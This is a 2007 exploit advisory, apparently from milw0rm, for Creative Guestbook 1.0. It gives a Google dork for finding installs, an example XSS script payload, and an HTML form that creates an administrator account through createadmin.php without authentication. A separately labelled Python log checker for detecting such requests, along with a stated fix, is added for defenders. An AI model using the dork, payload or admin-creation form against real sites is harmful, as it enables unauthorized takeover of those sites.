SECURITYVULNS:DOC:16397
Mar 17, 2007

Creative Guestbook 1.0 Multiple Remote Vulnerabilities

                                                      .-""""""""-.                                 
                                                     /   Dj7xpl   \                              
                                                    |              |                                
                                                    |,  .-.  .-.  ,|                                
                                                    | )(_o/  \o_)( |                                     
                                                    |/     /\     \|                                 
                                          (@_       (_     ^^     _)                  
                                     _     ) \_______\__|IIIIII|__/_______________________________
                                    (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                           )_/        \          / 
                                           (@

+____Iranian Are The Best In World+

Portal : Creative Guestbook 1.0

Download : http://www.thecreativeheads.de/CreativeFiles/downloads.php

Author : Dj7xpl | [email protected]

Dork : "Creative Guestbook"

Class : (Add Remote Admin User) And (Cross Site Scripting)

+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+

css/xss :

http://[Target]/[Path]/Guestbook.php <== Insert Your Script

Example : <script> alert (' dj7xpl ^_^ ') </script>

+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+

Add Remote Admin User :

<form name="admin" method="post" action="http://[target]/[path]/createadmin.php?PHPSESSID='.session_id().'">

<input type="text" name="Name" value="name"><br>

<input type="text" name="Email" value="email"><br>

<input type="text" name="PASSWORD" value="password"><br>

<input type="submit" value="Admin hinzuf&uuml;gen" name="submit">

</form>
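
Added example, not part of the original advisory: a log check for the request shape shown above, a POST to createadmin.php that arrives with no Referer or with a Referer from another host, as it would when the form is submitted from a page outside the site. It assumes Apache/nginx combined log format; the host name guestbook.example, the admin.php referrer, the function name and the log lines are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Combined log format:
# ip - user [time] "METHOD path proto" status size "referer" "agent"
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"'
)

# Constructed sample lines (documentation IP ranges, hypothetical host).
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Mar/2007:10:01:02 +0000] "POST /gb/createadmin.php?PHPSESSID=x HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [17/Mar/2007:10:05:00 +0000] "POST /gb/createadmin.php HTTP/1.1" 200 512 "http://guestbook.example/gb/admin.php" "Mozilla/5.0"',
    '203.0.113.9 - - [17/Mar/2007:10:06:00 +0000] "POST /gb/createadmin.php HTTP/1.1" 200 498 "http://other.example/form.html" "Mozilla/5.0"',
    '192.0.2.1 - - [17/Mar/2007:10:07:00 +0000] "GET /gb/Guestbook.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def suspicious_admin_creates(lines, site_host, script="createadmin.php"):
    """Return POSTs to `script` whose Referer is absent or not on site_host."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Compare only the script name so any install [path] is covered.
        path = urlparse(m["path"]).path
        if path.rsplit("/", 1)[-1].lower() != script:
            continue
        # A Referer of "-" or a malformed one yields no hostname.
        ref_host = (urlparse(m["referer"]).hostname or "").lower()
        if ref_host != site_host.lower():
            hits.append({
                "ip": m["ip"],
                "time": m["time"],
                "status": int(m["status"]),
                "referer": m["referer"],
            })
    return hits


if __name__ == "__main__":
    for hit in suspicious_admin_creates(SAMPLE_LOG, "guestbook.example"):
        print(hit)
```

The Referer header is set by the client, so this check only surfaces requests shaped like the published form and is a triage aid for existing logs. The actual fix is for createadmin.php to require an authenticated administrator session before creating an account.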

+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+

Sp Tnx : Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org,Simorgh …

+_______________________________________________________________________________________________________________________+

milw0rm.com [2007-03-15]